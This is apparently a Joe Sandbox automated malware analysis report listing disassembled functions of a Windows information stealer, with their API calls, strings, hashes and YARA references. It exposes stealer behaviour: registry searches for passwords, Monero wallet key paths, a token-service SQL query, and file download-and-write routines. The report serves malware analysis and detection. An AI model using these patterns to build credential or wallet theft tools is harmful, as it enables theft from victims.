                              • Opcode ID: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                              • Instruction ID: 9daf2dba117d18fe385431c7dd56eb21a3f8768d4a87b5b4635ea4756dc59528
                              • Opcode Fuzzy Hash: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                              • Instruction Fuzzy Hash: 0C2138B1E44208ABDB04DFD4CD4AFAEB7BDFB45B04F104219F605BB680C77969018BA9
                              Function 006860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • InternetOpenA.WININET(006A0DF7,00000001,00000000,00000000,00000000), ref: 0068610F
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 00686147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0068618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006861B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 006861DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00686249
                              • InternetCloseHandle.WININET(?), ref: 00686253
                              • InternetCloseHandle.WININET(00000000), ref: 00686260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                              • Instruction ID: 4f868e10947a5e448c6f051c7a655e6c3dc10ab58ec58b278c08abc5bb890c52
                              • Opcode Fuzzy Hash: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                              • Instruction Fuzzy Hash: 3D517FB1900218ABDF24EFA0DD49FEE77B9FB04705F108198B605A72C1DB746A85CF95
                              Function 006872D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                              • HeapFree.KERNEL32(00000000), ref: 00687459
                              • task.LIBCPMTD ref: 00687555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                              • Instruction ID: be00fc76eb9cd8657cdeb558cdef36094ccb8fa492b51955a6946a8a2dc56024
                              • Opcode Fuzzy Hash: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                              • Instruction Fuzzy Hash: 39613CB580011C9BDB24EB50CC55BE9B7B9BF44304F1082E9E689A6141DF70AFC9CFA5
                              Function 0068BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0068BC9F
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0068BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0068BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                              • Instruction ID: b8b1f8409d98e8cd909572619cedec3c26b8d2eea17923cd6a1b05ed608e1686
                              • Opcode Fuzzy Hash: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                              • Instruction Fuzzy Hash: FEB12B719201189BDF44FBE0DD96EEE73BEBF14300F40415CF506A6591EE346A49CBAA
                              Function 00696770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                              • Instruction ID: f9f427c572ab6a67ac0c4e0525b1532d487a78faf117dedd3129fc90ed726f3d
                              • Opcode Fuzzy Hash: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                              • Instruction Fuzzy Hash: AEF0583090820DEFD748AFE0ED1DB6CBB74FB0470BF040199F6498A790EA704B419BA6
                              Function 00684FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00684FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00684FD1
                              • InternetOpenA.WININET(006A0DDF,00000000,00000000,00000000,00000000), ref: 00684FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685041
                              • InternetCloseHandle.WININET(?), ref: 006850B9
                              • InternetCloseHandle.WININET(?), ref: 006850C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 0d8a3f328a323e6307e5b9bc4b42c16d9edc667166106e46834a90dfbaa69932
                              • Instruction ID: 484b7ca5b4d2e89440ad203d420dd7a64f0be1a829e6283a07587bbc101438ac
                              • Opcode Fuzzy Hash: 0d8a3f328a323e6307e5b9bc4b42c16d9edc667166106e46834a90dfbaa69932
                              • Instruction Fuzzy Hash: 7331E4B4A0021CABDB24DF54DC89BDDB7B5FB48708F1081D9EA09A7281D7706AC58F99
                              Function 006983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                              • wsprintfA.USER32 ref: 00698459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0148E2C0,00000000,000F003F,?,00000400), ref: 006984EC
                              • lstrlen.KERNEL32(?), ref: 00698501
                              • RegQueryValueExA.ADVAPI32(00000000,0148E1D0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006A0B34), ref: 00698599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00698608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0069861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                              • Instruction ID: d43f031d78324e430754a0d7ac8fb52dd1c93ca5ba51c03f7c7904f3f0f632ad
                              • Opcode Fuzzy Hash: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                              • Instruction Fuzzy Hash: 3721D67191022CAFDB68DB54DC85FE9B3B9FB48704F00C598A649A6240DE71AA85CFE4
                              Function 00697690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006976A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006976AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0147C278,00000000,00020119,00000000), ref: 006976DD
                              • RegQueryValueExA.ADVAPI32(00000000,0148E218,00000000,00000000,?,000000FF), ref: 006976FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00697708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                              • Instruction ID: eca3a8a2fd42452c9dc7913312eb2aa4cab177b105e3fd6d8e01069622f18d4f
                              • Opcode Fuzzy Hash: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                              • Instruction Fuzzy Hash: 0E0162B5A04208BBEB04DBE4DC4DFBEB7BDFB48705F104054FA04EB290D67099048B51
                              Function 00697720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0069773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0147C278,00000000,00020119,006976B9), ref: 0069775B
                              • RegQueryValueExA.ADVAPI32(006976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0069777A
                              • RegCloseKey.ADVAPI32(006976B9), ref: 00697784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                              • Instruction ID: f23030703108f302c0a53459626327028e8a21bd1548e73eff2321a411ba3e0a
                              • Opcode Fuzzy Hash: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                              • Instruction Fuzzy Hash: AB01FFB5A40308BBEB04DBE4DC4AFAEB7B8FB48705F104559FA05A7281DA715A008B51
                              Function 006992E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(:i,80000000,00000003,00000000,00000003,00000080,00000000,?,00693AEE,?), ref: 006992FC
                              • GetFileSizeEx.KERNEL32(000000FF,:i), ref: 00699319
                              • CloseHandle.KERNEL32(000000FF), ref: 00699327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :i$:i
                              • API String ID: 1378416451-3159782484
                              • Opcode ID: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                              • Instruction ID: b6483a82c526e8679f64a02452f71716c278dff5426dab02b160c6d990979f93
                              • Opcode Fuzzy Hash: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                              • Instruction Fuzzy Hash: F1F01475E40208ABDF14DFB4DC49F9E77BABB48720F108258AA91A72C0D671AA018B60
                              Function 006899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
